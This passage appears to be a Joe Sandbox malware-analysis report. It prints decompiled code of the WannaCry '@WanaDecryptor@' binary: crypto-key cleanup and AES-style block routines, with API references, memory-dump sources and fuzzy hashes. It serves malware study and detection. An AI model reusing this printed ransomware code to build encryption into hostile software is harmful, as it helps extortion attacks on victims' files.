                                                      • Instruction Fuzzy Hash: 3E012C71148380BFE340DB6888C4AABBFE8EBD4704FC4985DF58543252D234D848DB6B
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00404770(void* __ecx) {
                                                      				long* _t7;
                                                      				long* _t8;
                                                      				long* _t9;
                                                      				void* _t15;
                                                      
                                                      				_t15 = __ecx;
                                                      				_t7 =  *(__ecx + 8);
                                                      				if(_t7 != 0) {
                                                      					CryptDestroyKey(_t7);
                                                      					 *(_t15 + 8) = 0;
                                                      				}
                                                      				_t8 =  *(_t15 + 0xc);
                                                      				if(_t8 != 0) {
                                                      					CryptDestroyKey(_t8);
                                                      					 *(_t15 + 0xc) = 0;
                                                      				}
                                                      				_t9 =  *(_t15 + 4);
                                                      				if(_t9 != 0) {
                                                      					CryptReleaseContext(_t9, 0);
                                                      					 *(_t15 + 4) = 0;
                                                      				}
                                                      				return 1;
                                                      			}

                                                      APIs
                                                      • CryptDestroyKey.ADVAPI32(?,?,004049AD,00404990), ref: 0040477B
                                                      • CryptDestroyKey.ADVAPI32(?,?,004049AD,00404990), ref: 00404790
                                                      • CryptReleaseContext.ADVAPI32(FFFFFFFF,00000000,?,004049AD,00404990), ref: 004047A7
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Crypt$Destroy$ContextRelease
                                                      • String ID:
                                                      • API String ID: 1308222791-0
                                                      • Opcode ID: 12ad5d49cc2128f0860c2128d2759e128a7075486b136358530e399bbd2bca92
                                                      • Instruction ID: 61d89c14c75fb5affeedc9811425020a0caf5e5d08399d1baa26ca37d3ca979d
                                                      • Opcode Fuzzy Hash: 12ad5d49cc2128f0860c2128d2759e128a7075486b136358530e399bbd2bca92
                                                      • Instruction Fuzzy Hash: 22E0EDB03007018BD7309F65D888B4377E8AF84714F04882DF85AE77D0C778E8408B54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 33%
                                                      			E0040A9D0(intOrPtr __ecx, signed int _a4, signed char* _a8) {
                                                      				void* _v12;
                                                      				signed int _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _v24;
                                                      				void* _v25;
                                                      				void* _v26;
                                                      				signed int _v28;
                                                      				void* _v29;
                                                      				void* _v30;
                                                      				void* _v31;
                                                      				signed int _v32;
                                                      				void* _v33;
                                                      				void* _v34;
                                                      				void* _v35;
                                                      				signed int _v36;
                                                      				void* _v37;
                                                      				void* _v38;
                                                      				void* _v39;
                                                      				signed int _v40;
                                                      				signed int _t161;
                                                      				signed int _t162;
                                                      				signed char* _t165;
                                                      				signed int _t187;
                                                      				signed int _t188;
                                                      				intOrPtr _t190;
                                                      				signed int _t277;
                                                      				signed int _t345;
                                                      				signed int _t346;
                                                      				signed int _t349;
                                                      				signed int _t360;
                                                      				signed int _t361;
                                                      				signed int _t364;
                                                      				intOrPtr _t375;
                                                      				intOrPtr _t386;
                                                      				void* _t387;
                                                      				signed int _t388;
                                                      
                                                      				_t375 = __ecx;
                                                      				_v24 = __ecx;
                                                      				if( *((intOrPtr*)(__ecx + 4)) == 0) {
                                                      					__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
                                                      					_push(0x41c9c0);
                                                      					_push( &_v16);
                                                      					L004130FC();
                                                      				}
                                                      				_t345 = 0xbadbad ^  *(_t375 + 0x1e8);
                                                      				_v28 = 0 << 0x18;
                                                      				_v40 = 0xbadbad ^  *(_v24 + 0x1ec);
                                                      				_t277 = 0xbadbad ^  *(_v24 + 0x1f0);
                                                      				_v32 = 0 << 0x18;
                                                      				_t386 = _v24;
                                                      				_t161 =  *(_t386 + 0x410);
                                                      				_v36 = 0xbadbad ^  *(_t386 + 0x1f4);
                                                      				_v16 = _t161;
                                                      				if(_t161 > 1) {
                                                      					_a4 = _t386 + 0x210;
                                                      					_v20 = _t161 - 1;
                                                      					do {
                                                      						_t349 = _t345 & 0x000000ff;
                                                      						_t187 = _a4;
                                                      						_t188 = _t187 + 0x20;
                                                      						_a4 = _t188;
                                                      						_v40 =  *0x004189B0 ^  *0x004181B0 ^  *0x004185B0 ^  *(0x418db0 + (_t277 & 0x000000ff) * 4) ^  *(_a4 - 4);
                                                      						_t277 =  *0x004181B0 ^  *0x004185B0 ^  *0x004189B0 ^  *(0x418db0 + (_v36 & 0x000000ff) * 4) ^  *_a4;
                                                      						_t345 =  *0x004185B0 ^  *0x004189B0 ^  *0x004181B0 ^  *(0x418db0 + (_v40 & 0x000000ff) * 4) ^  *(_t188 - 0x28);
                                                      						_t190 = _v20 - 1;
                                                      						_v28 = _t345;
                                                      						_v32 = _t277;
                                                      						_v36 =  *0x004181B0 ^  *0x004185B0 ^  *0x004189B0 ^  *(0x418db0 + _t349 * 4) ^  *(_t187 + 4);
                                                      						_v20 = _t190;
                                                      					} while (_t190 != 0);
                                                      					_t161 = _v16;
                                                      					_t386 = _v24;
                                                      				}
                                                      				_t162 = _t161 << 5;
                                                      				_t360 =  *(_t162 + _t386 + 0x1e8);
                                                      				_t387 = _t162 + _t386 + 0x1e8;
                                                      				_a4 = _t360;
                                                      				_t165 = _a8;
                                                      				 *_t165 =  *0x004170B0 ^ _t360 >> 0x00000018;
                                                      				_t165[1] =  *0x004170B0 ^ _t360 >> 0x00000010;
                                                      				_t165[2] =  *0x004170B0 ^ _t360 >> 0x00000008;
                                                      				_t165[3] =  *((_v40 & 0x000000ff) + 0x4170b0) ^ _a4;
                                                      				_t361 =  *(_t387 + 4);
                                                      				_a4 = _t361;
                                                      				_t165[4] =  *0x004170B0 ^ _t361 >> 0x00000018;
                                                      				_t165[5] =  *0x004170B0 ^ _t361 >> 0x00000010;
                                                      				_t165[6] =  *0x004170B0 ^ _t361 >> 0x00000008;
                                                      				_t165[7] =  *((_v32 & 0x000000ff) + 0x4170b0) ^ _a4;
                                                      				_t364 =  *(_t387 + 8);
                                                      				_a4 = _t364;
                                                      				_t165[8] =  *0x004170B0 ^ _t364 >> 0x00000018;
                                                      				_t165[9] =  *0x004170B0 ^ _t364 >> 0x00000010;
                                                      				_t125 = _t345 + 0x4170b0; // 0xd56a0952
                                                      				_t165[0xa] =  *_t125 ^ _t364 >> 0x00000008;
                                                      				_t346 = _t345 & 0x000000ff;
                                                      				_t165[0xb] =  *((_v36 & 0x000000ff) + 0x4170b0) ^ _a4;
                                                      				_t388 =  *(_t387 + 0xc);
                                                      				_a4 = _t388;
                                                      				_t165[0xc] =  *0x004170B0 ^ _t388 >> 0x00000018;
                                                      				_t165[0xd] =  *0x004170B0 ^ _t388 >> 0x00000010;
                                                      				_t165[0xe] =  *0x004170B0 ^ _t388 >> 0x00000008;
                                                      				_t142 = _t346 + 0x4170b0; // 0xd56a0952
                                                      				_t165[0xf] =  *_t142 ^ _a4;
                                                      				return _t165;
                                                      			}

                                                      APIs
                                                      • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040A9EA
                                                      • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A9FA
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ??0exception@@ExceptionThrow
                                                      • String ID:
                                                      • API String ID: 941485209-0
                                                      • Opcode ID: 3b2a473cc84b9c7d4a547ef160aa3472c07a9cc6d6db5064c85298185bfba711
                                                      • Instruction ID: 04248197bcb1574b3d90ae1a3c7ae13e194e7d8d0e6a6b40a3143ad68c5bfd1a
                                                      • Opcode Fuzzy Hash: 3b2a473cc84b9c7d4a547ef160aa3472c07a9cc6d6db5064c85298185bfba711
                                                      • Instruction Fuzzy Hash: 0AC18E3260C3D14FD305CF7994A41ABBFE2AF9E300F9E98ADE5D98B312C5609505CB99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 33%
                                                      			E0040A610(signed int __ecx) {
                                                      				signed char* _t157;
                                                      				signed int _t259;
                                                      				signed int _t260;
                                                      				signed int _t276;
                                                      				signed int _t357;
                                                      				signed int _t358;
                                                      				signed int _t359;
                                                      				signed int _t378;
                                                      				signed int _t379;
                                                      				void* _t380;
                                                      				signed int _t381;
                                                      				signed int _t390;
                                                      				signed int _t391;
                                                      				void* _t392;
                                                      				void* _t393;
                                                      
                                                      				_t391 = __ecx;
                                                      				 *(_t393 + 0x18) = __ecx;
                                                      				if( *((intOrPtr*)(__ecx + 4)) == 0) {
                                                      					__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
                                                      					_push(0x41c9c0);
                                                      					_push(_t393 + 0x1c);
                                                      					L004130FC();
                                                      				}
                                                      				_t276 = 0xbadbad ^  *(_t391 + 8);
                                                      				 *(_t393 + 0x18) = 0 << 0x18;
                                                      				 *(_t393 + 0x14) = 0xbadbad ^  *(_t391 + 0xc);
                                                      				_t259 = 0xbadbad ^  *(_t391 + 0x10);
                                                      				 *(_t393 + 0x1c) = 0 << 0x18;
                                                      				_t378 =  *(_t391 + 0x410);
                                                      				 *(_t393 + 0x10) =  *(_t391 + 0x14) ^ 0xbadbad;
                                                      				 *(_t393 + 0x20) = _t378;
                                                      				if(_t378 > 1) {
                                                      					_t392 = _t391 + 0x30;
                                                      					 *(_t393 + 0x38) = _t378 - 1;
                                                      					do {
                                                      						_t392 = _t392 + 0x20;
                                                      						 *(_t393 + 0x14) =  *0x004179B0 ^  *0x004175B0 ^  *0x004171B0 ^  *(0x417db0 + (_t276 & 0x000000ff) * 4) ^  *(_t392 - 0x24);
                                                      						 *(_t393 + 0x10) =  *0x004171B0 ^  *0x004179B0 ^  *0x004175B0 ^  *(0x417db0 + (_t259 & 0x000000ff) * 4) ^  *(_t392 - 0x1c);
                                                      						_t259 =  *0x004175B0 ^  *0x004171B0 ^  *0x004179B0 ^  *(0x417db0 + ( *(_t393 + 0x14) & 0x000000ff) * 4) ^  *(_t392 - 0x20);
                                                      						_t276 =  *0x004179B0 ^  *0x004175B0 ^  *0x004171B0 ^  *(0x417db0 + ( *(_t393 + 0x10) & 0x000000ff) * 4) ^  *(_t392 - 0x28);
                                                      						_t390 =  *(_t393 + 0x38) - 1;
                                                      						 *(_t393 + 0x18) = _t276;
                                                      						 *(_t393 + 0x1c) = _t259;
                                                      						 *(_t393 + 0x38) = _t390;
                                                      					} while (_t390 != 0);
                                                      					_t378 =  *(_t393 + 0x20);
                                                      					_t391 =  *((intOrPtr*)(_t393 + 0x24));
                                                      				}
                                                      				_t379 = _t378 << 5;
                                                      				_t357 =  *(_t391 + 8 + _t379);
                                                      				_t380 = _t391 + 8 + _t379;
                                                      				_t157 =  *(_t393 + 0x3c);
                                                      				 *_t157 =  *0x00416FB0 ^ _t357 >> 0x00000018;
                                                      				 *(_t393 + 0x38) = _t357;
                                                      				_t157[1] =  *0x00416FB0 ^ _t357 >> 0x00000010;
                                                      				_t87 = _t259 + 0x416fb0; // 0x7b777c63
                                                      				_t157[2] =  *_t87 ^ _t357 >> 0x00000008;
                                                      				_t157[3] =  *(( *(_t393 + 0x10) & 0x000000ff) + 0x416fb0) ^  *(_t393 + 0x38);
                                                      				_t358 =  *(_t380 + 4);
                                                      				 *(_t393 + 0x38) = _t358;
                                                      				_t157[4] =  *0x00416FB0 ^ _t358 >> 0x00000018;
                                                      				_t157[5] =  *0x00416FB0 ^ _t358 >> 0x00000010;
                                                      				_t157[6] =  *0x00416FB0 ^ _t358 >> 0x00000008;
                                                      				_t157[7] =  *(( *(_t393 + 0x18) & 0x000000ff) + 0x416fb0) ^  *(_t393 + 0x38);
                                                      				_t359 =  *(_t380 + 8);
                                                      				 *(_t393 + 0x38) = _t359;
                                                      				_t157[8] =  *0x00416FB0 ^ _t359 >> 0x00000018;
                                                      				_t157[9] =  *0x00416FB0 ^ _t359 >> 0x00000010;
                                                      				_t260 = _t259 & 0x000000ff;
                                                      				_t157[0xa] =  *0x00416FB0 ^ _t359 >> 0x00000008;
                                                      				_t157[0xb] =  *(( *(_t393 + 0x14) & 0x000000ff) + 0x416fb0) ^  *(_t393 + 0x38);
                                                      				_t381 =  *(_t380 + 0xc);
                                                      				 *(_t393 + 0x34) = _t381;
                                                      				_t157[0xc] =  *0x00416FB0 ^ _t381 >> 0x00000018;
                                                      				_t157[0xd] =  *0x00416FB0 ^ _t381 >> 0x00000010;
                                                      				_t157[0xe] =  *0x00416FB0 ^ _t381 >> 0x00000008;
                                                      				_t134 = _t260 + 0x416fb0; // 0x7b777c63
                                                      				_t157[0xf] =  *_t134 ^  *(_t393 + 0x2c);
                                                      				return _t157;
                                                      			}


                                                      APIs
                                                      • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040A62A
                                                      • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A63A
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ??0exception@@ExceptionThrow
                                                      • String ID:
                                                      • API String ID: 941485209-0
                                                      • Opcode ID: 54df54d15dbdb5da3c1e43968a1bcec609f58f276c7696173b96fc0568058aab
                                                      • Instruction ID: 24c55d493b92f0f745426086bc8efec80d3c09ac131e354686a8208b9adac079
                                                      • Opcode Fuzzy Hash: 54df54d15dbdb5da3c1e43968a1bcec609f58f276c7696173b96fc0568058aab
                                                      • Instruction Fuzzy Hash: CFC15B2260C2C24BD705CF7998E04EBFFE3AF9E204B4E95A9D5C99B322C5719409C799
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 58%
                                                      			E0040B0C0(intOrPtr __ecx) {
                                                      				intOrPtr _t137;
                                                      				signed int _t141;
                                                      				signed int _t142;
                                                      				signed int* _t144;
                                                      				signed int _t145;
                                                      				void* _t173;
                                                      				signed int* _t189;
                                                      				signed int _t192;
                                                      				signed int _t196;
                                                      				intOrPtr _t198;
                                                      				signed char _t200;
                                                      				intOrPtr _t207;
                                                      				signed int _t227;
                                                      				signed int _t231;
                                                      				intOrPtr _t233;
                                                      				intOrPtr _t262;
                                                      				void* _t266;
                                                      				signed int _t268;
                                                      				signed int* _t270;
                                                      				signed char* _t274;
                                                      				signed char* _t275;
                                                      				signed char* _t276;
                                                      				signed char* _t277;
                                                      				intOrPtr _t281;
                                                      				signed int _t282;
                                                      				intOrPtr _t286;
                                                      				void* _t287;
                                                      
                                                      				_t286 = __ecx;
                                                      				if( *((intOrPtr*)(__ecx + 4)) == 0) {
                                                      					__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
                                                      					_push(0x41c9c0);
                                                      					_push(_t287 + 0x34);
                                                      					L004130FC();
                                                      				}
                                                      				_t137 =  *((intOrPtr*)(_t286 + 0x3cc));
                                                      				if(_t137 != 0x10) {
                                                      					asm("cdq");
                                                      					_t196 = _t137 + (_t231 & 0x00000003) >> 2;
                                                      					if(_t196 != 4) {
                                                      						_t141 = (0 | _t196 != 0x00000006) + 1;
                                                      					} else {
                                                      						_t141 = 0;
                                                      					}
                                                      					_t142 = _t141 << 5;
                                                      					_t9 = _t142 + 0x41a1dc; // 0x3
                                                      					_t233 =  *_t9;
                                                      					_t10 = _t142 + 0x41a1e4; // 0x2
                                                      					_t198 =  *_t10;
                                                      					_t11 = _t142 + 0x41a1ec; // 0x1
                                                      					 *((intOrPtr*)(_t287 + 0x30)) = _t233;
                                                      					 *((intOrPtr*)(_t287 + 0x20)) =  *_t11;
                                                      					 *((intOrPtr*)(_t287 + 0x14)) = _t198;
                                                      					_t15 = _t286 + 0x454; // 0x4a8
                                                      					_t144 = _t15;
                                                      					if(_t196 > 0) {
                                                      						_t282 =  *(_t287 + 0x44);
                                                      						_t17 = _t286 + 0x1e8; // 0x23c
                                                      						 *(_t287 + 0x10) = _t17;
                                                      						 *(_t287 + 0x18) = _t196;
                                                      						do {
                                                      							 *_t144 = 0 << 0x18;
                                                      							_t268 =  *_t144 | 0 << 0x00000010;
                                                      							 *_t144 = _t268;
                                                      							 *_t144 = _t268;
                                                      							_t270 = _t144;
                                                      							_t282 = _t282 + 4;
                                                      							_t144 =  &(_t144[1]);
                                                      							 *_t270 =  *_t270 ^  *( *(_t287 + 0x10));
                                                      							_t227 =  *(_t287 + 0x18) - 1;
                                                      							 *(_t287 + 0x10) =  *(_t287 + 0x10) + 4;
                                                      							 *(_t287 + 0x18) = _t227;
                                                      						} while (_t227 != 0);
                                                      						_t198 =  *((intOrPtr*)(_t287 + 0x14));
                                                      					}
                                                      					_t145 = 1;
                                                      					 *(_t287 + 0x1c) = 1;
                                                      					if( *(_t286 + 0x410) > 1) {
                                                      						_t28 = _t286 + 0x208; // 0x25c
                                                      						 *(_t287 + 0x44) = _t28;
                                                      						do {
                                                      							if(_t196 > 0) {
                                                      								_t281 = _t233;
                                                      								 *(_t287 + 0x18) =  *(_t287 + 0x44);
                                                      								_t207 =  *((intOrPtr*)(_t287 + 0x20)) - _t233;
                                                      								_t33 = _t286 + 0x434; // 0x488
                                                      								_t266 = _t33;
                                                      								 *((intOrPtr*)(_t287 + 0x28)) = _t198 - _t233;
                                                      								 *((intOrPtr*)(_t287 + 0x24)) = _t207;
                                                      								 *(_t287 + 0x10) = _t196;
                                                      								while(1) {
                                                      									_t266 = _t266 + 4;
                                                      									asm("cdq");
                                                      									 *(_t287 + 0x2c) = 0;
                                                      									asm("cdq");
                                                      									asm("cdq");
                                                      									_t189 =  *(_t287 + 0x18);
                                                      									 *(_t287 + 0x18) =  &(_t189[1]);
                                                      									 *(_t266 - 4) =  *(0x4189b0 +  *(_t287 + 0x2c) * 4) ^  *(0x418db0 + ( *(_t286 + 0x454 + (_t207 + _t281) % _t196 * 4) & 0x000000ff) * 4) ^  *0x004185B0 ^  *0x004181B0 ^  *_t189;
                                                      									_t281 = _t281 + 1;
                                                      									_t192 =  *(_t287 + 0x10) - 1;
                                                      									 *(_t287 + 0x10) = _t192;
                                                      									if(_t192 == 0) {
                                                      										break;
                                                      									}
                                                      									_t207 =  *((intOrPtr*)(_t287 + 0x24));
                                                      								}
                                                      								_t233 =  *((intOrPtr*)(_t287 + 0x30));
                                                      							}
                                                      							_t79 = _t286 + 0x434; // 0x488
                                                      							_t80 = _t286 + 0x454; // 0x4a8
                                                      							_t173 = memcpy(_t80, _t79, _t196 << 2);
                                                      							_t287 = _t287 + 0xc;
                                                      							_t145 = _t173 + 1;
                                                      							_t198 =  *((intOrPtr*)(_t287 + 0x14));
                                                      							 *(_t287 + 0x1c) = _t145;
                                                      							 *(_t287 + 0x44) =  *(_t287 + 0x44) + 0x20;
                                                      						} while (_t145 <  *(_t286 + 0x410));
                                                      					}
                                                      					 *(_t287 + 0x44) = 0;
                                                      					if(_t196 > 0) {
                                                      						_t274 =  *(_t287 + 0x48);
                                                      						_t89 = _t286 + 0x454; // 0x4a8
                                                      						 *(_t287 + 0x48) = _t89;
                                                      						_t262 = _t198;
                                                      						 *((intOrPtr*)(_t287 + 0x30)) = _t233 - _t198;
                                                      						 *(_t287 + 0x2c) =  *((intOrPtr*)(_t287 + 0x20)) - _t198;
                                                      						do {
                                                      							_t200 =  *(_t286 + 0x1e8 + ( *(_t287 + 0x44) +  *(_t286 + 0x410) * 8) * 4);
                                                      							 *_t274 =  *0x004170B0 ^ _t200 >> 0x00000018;
                                                      							_t275 =  &(_t274[1]);
                                                      							asm("cdq");
                                                      							 *_t275 =  *0x004170B0 ^ _t200 >> 0x00000010;
                                                      							asm("cdq");
                                                      							_t276 =  &(_t275[1]);
                                                      							 *_t276 =  *0x004170B0 ^ _t200 >> 0x00000008;
                                                      							_t277 =  &(_t276[1]);
                                                      							asm("cdq");
                                                      							 *_t277 =  *(( *(_t286 + 0x454 + ( *(_t287 + 0x2c) + _t262) % _t196 * 4) & 0x000000ff) + 0x4170b0) ^ _t200;
                                                      							_t274 =  &(_t277[1]);
                                                      							_t145 =  *(_t287 + 0x44) + 1;
                                                      							_t262 = _t262 + 1;
                                                      							 *(_t287 + 0x44) = _t145;
                                                      							 *(_t287 + 0x48) =  &(( *(_t287 + 0x48))[4]);
                                                      						} while (_t145 < _t196);
                                                      					}
                                                      					return _t145;
                                                      				} else {
                                                      					return E0040A9D0(_t286,  *(_t287 + 0x44),  *(_t287 + 0x48));
                                                      				}
                                                      			}

                                                      0x0040b2ca
                                                      0x0040b1de
                                                      0x0040b2d6
                                                      0x0040b2de
                                                      0x0040b2e4
                                                      0x0040b2e8
                                                      0x0040b2ee
                                                      0x0040b2fa
                                                      0x0040b2fc
                                                      0x0040b300
                                                      0x0040b304
                                                      0x0040b313
                                                      0x0040b332
                                                      0x0040b334
                                                      0x0040b338
                                                      0x0040b351
                                                      0x0040b355
                                                      0x0040b35a
                                                      0x0040b373
                                                      0x0040b375
                                                      0x0040b379
                                                      0x0040b398
                                                      0x0040b39a
                                                      0x0040b39b
                                                      0x0040b39f
                                                      0x0040b3a2
                                                      0x0040b3a6
                                                      0x0040b3a6
                                                      0x0040b304
                                                      0x0040b3b7
                                                      0x0040b0f9
                                                      0x0040b111
                                                      0x0040b111

                                                      APIs
                                                      • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B0D9
                                                      • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B0E9
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ??0exception@@ExceptionThrow
                                                      • String ID:
                                                      • API String ID: 941485209-0
                                                      • Opcode ID: c6e345f075c5c38347d25a9e792861e5e46be767ff3c74cb7ef541de985aba14
                                                      • Instruction ID: 635c181c6a855438023d43a1e61ad1cbf7521d36b86b6127b0536a3f97539009
                                                      • Opcode Fuzzy Hash: c6e345f075c5c38347d25a9e792861e5e46be767ff3c74cb7ef541de985aba14
                                                      • Instruction Fuzzy Hash: 5F91AE756083858FC718CF28D8906AABBE2FFC9304F14487EE989D7351D634A945CB99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 58%
                                                      			E0040ADC0(signed int __ecx) {
                                                      				intOrPtr _t137;
                                                      				signed int _t141;
                                                      				signed int _t142;
                                                      				signed int* _t144;
                                                      				signed int _t145;
                                                      				void* _t173;
                                                      				signed int* _t189;
                                                      				signed int _t192;
                                                      				signed int _t196;
                                                      				intOrPtr _t198;
                                                      				signed char _t200;
                                                      				intOrPtr _t207;
                                                      				signed int _t227;
                                                      				signed int _t231;
                                                      				intOrPtr _t233;
                                                      				intOrPtr _t262;
                                                      				void* _t266;
                                                      				signed int _t268;
                                                      				signed int* _t270;
                                                      				signed char* _t274;
                                                      				signed char* _t275;
                                                      				signed char* _t276;
                                                      				signed char* _t277;
                                                      				intOrPtr _t281;
                                                      				signed int _t282;
                                                      				signed int _t286;
                                                      				void* _t287;
                                                      
                                                      				_t286 = __ecx;
                                                      				if( *((intOrPtr*)(__ecx + 4)) == 0) {
                                                      					__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
                                                      					_push(0x41c9c0);
                                                      					_push(_t287 + 0x34);
                                                      					L004130FC();
                                                      				}
                                                      				_t137 =  *((intOrPtr*)(_t286 + 0x3cc));
                                                      				if(_t137 != 0x10) {
                                                      					asm("cdq");
                                                      					_t196 = _t137 + (_t231 & 0x00000003) >> 2;
                                                      					if(_t196 != 4) {
                                                      						_t141 = (0 | _t196 != 0x00000006) + 1;
                                                      					} else {
                                                      						_t141 = 0;
                                                      					}
                                                      					_t142 = _t141 << 5;
                                                      					_t9 = _t142 + 0x41a1d8; // 0x1
                                                      					_t233 =  *_t9;
                                                      					_t10 = _t142 + 0x41a1e0; // 0x2
                                                      					_t198 =  *_t10;
                                                      					_t11 = _t142 + 0x41a1e8; // 0x3
                                                      					 *((intOrPtr*)(_t287 + 0x30)) = _t233;
                                                      					 *((intOrPtr*)(_t287 + 0x20)) =  *_t11;
                                                      					 *((intOrPtr*)(_t287 + 0x14)) = _t198;
                                                      					_t15 = _t286 + 0x454; // 0x4a8
                                                      					_t144 = _t15;
                                                      					if(_t196 > 0) {
                                                      						_t282 =  *(_t287 + 0x44);
                                                      						_t17 = _t286 + 8; // 0x5c
                                                      						 *(_t287 + 0x10) = _t17;
                                                      						 *(_t287 + 0x18) = _t196;
                                                      						do {
                                                      							 *_t144 = 0 << 0x18;
                                                      							_t268 =  *_t144 | 0 << 0x00000010;
                                                      							 *_t144 = _t268;
                                                      							 *_t144 = _t268;
                                                      							_t270 = _t144;
                                                      							_t282 = _t282 + 4;
                                                      							_t144 =  &(_t144[1]);
                                                      							 *_t270 =  *_t270 ^  *( *(_t287 + 0x10));
                                                      							_t227 =  *(_t287 + 0x18) - 1;
                                                      							 *(_t287 + 0x10) =  *(_t287 + 0x10) + 4;
                                                      							 *(_t287 + 0x18) = _t227;
                                                      						} while (_t227 != 0);
                                                      						_t198 =  *((intOrPtr*)(_t287 + 0x14));
                                                      					}
                                                      					_t145 = 1;
                                                      					 *(_t287 + 0x1c) = 1;
                                                      					if( *(_t286 + 0x410) > 1) {
                                                      						_t28 = _t286 + 0x28; // 0x7c
                                                      						 *(_t287 + 0x44) = _t28;
                                                      						do {
                                                      							if(_t196 > 0) {
                                                      								_t281 = _t233;
                                                      								 *(_t287 + 0x18) =  *(_t287 + 0x44);
                                                      								_t207 =  *((intOrPtr*)(_t287 + 0x20)) - _t233;
                                                      								_t33 = _t286 + 0x434; // 0x488
                                                      								_t266 = _t33;
                                                      								 *((intOrPtr*)(_t287 + 0x28)) = _t198 - _t233;
                                                      								 *((intOrPtr*)(_t287 + 0x24)) = _t207;
                                                      								 *(_t287 + 0x10) = _t196;
                                                      								while(1) {
                                                      									_t266 = _t266 + 4;
                                                      									asm("cdq");
                                                      									 *(_t287 + 0x2c) = 0;
                                                      									asm("cdq");
                                                      									asm("cdq");
                                                      									_t189 =  *(_t287 + 0x18);
                                                      									 *(_t287 + 0x18) =  &(_t189[1]);
                                                      									 *(_t266 - 4) =  *(0x4179b0 +  *(_t287 + 0x2c) * 4) ^  *(0x417db0 + ( *(_t286 + 0x454 + (_t207 + _t281) % _t196 * 4) & 0x000000ff) * 4) ^  *0x004175B0 ^  *0x004171B0 ^  *_t189;
                                                      									_t281 = _t281 + 1;
                                                      									_t192 =  *(_t287 + 0x10) - 1;
                                                      									 *(_t287 + 0x10) = _t192;
                                                      									if(_t192 == 0) {
                                                      										break;
                                                      									}
                                                      									_t207 =  *((intOrPtr*)(_t287 + 0x24));
                                                      								}
                                                      								_t233 =  *((intOrPtr*)(_t287 + 0x30));
                                                      							}
                                                      							_t79 = _t286 + 0x434; // 0x488
                                                      							_t80 = _t286 + 0x454; // 0x4a8
                                                      							_t173 = memcpy(_t80, _t79, _t196 << 2);
                                                      							_t287 = _t287 + 0xc;
                                                      							_t145 = _t173 + 1;
                                                      							_t198 =  *((intOrPtr*)(_t287 + 0x14));
                                                      							 *(_t287 + 0x1c) = _t145;
